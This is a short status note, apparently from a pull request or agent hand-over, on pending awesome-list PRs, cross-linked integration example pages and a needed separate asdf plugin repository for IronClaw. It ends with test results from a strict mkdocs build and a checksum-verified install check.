- **Awesome-list PRs** are held until the sibling example dirs land (links must resolve): JS/TS (50abf874) + smolagents/ADK (b018d821). The SEO pages already cross-link `examples/integrations/{vercel-ai-sdk,langchain-js,smolagents,google-adk}`.
- **Dedicated `IronSecCo/asdf-ironclaw` repo** is needed for `asdf plugin add ironclaw` / `mise use asdf:...` (asdf clones plugins by URL). That is a new-repo creation = out of boundary -> board follow-up. The scripts are runnable directly today.

## Test
`mkdocs build --strict` clean; plugin scripts verified against the live v0.1.217 release (checksum-verified install).